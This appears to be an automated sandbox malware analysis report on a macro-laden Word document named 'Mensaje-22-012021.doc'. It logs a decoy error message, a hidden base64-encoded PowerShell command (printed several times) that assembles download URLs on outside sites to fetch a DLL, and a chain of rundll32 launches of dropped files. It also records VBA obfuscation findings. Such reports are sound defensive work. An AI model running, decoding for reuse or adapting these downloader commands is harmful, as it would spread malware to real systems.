FsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\d source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdbge source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2156319928.0000000002030000.00000002.00000001.sdmp
Source:	Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp

Source: Mensaje-22-012021.doc

Initial sample: OLE summary subject = SQL proactive Tools & Tools user-centric Electronics RSS withdrawal Movies, Garden & Clothing Beauty Unbranded Fresh Mouse bluetooth e-enable HDD

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: Mensaje-22-012021.doc	Stream path 'Macros/VBA/G8g2gkh6bwry__ui' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module G8g2gkh6bwry__ui			Name: G8g2gkh6bwry__ui

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: Mensaje-22-012021.doc	Stream path 'Macros/VBA/G8g2gkh6bwry__ui' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module G8g2gkh6bwry__ui			Name: G8g2gkh6bwry__ui

Obfuscated command line found

Source: unknown

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
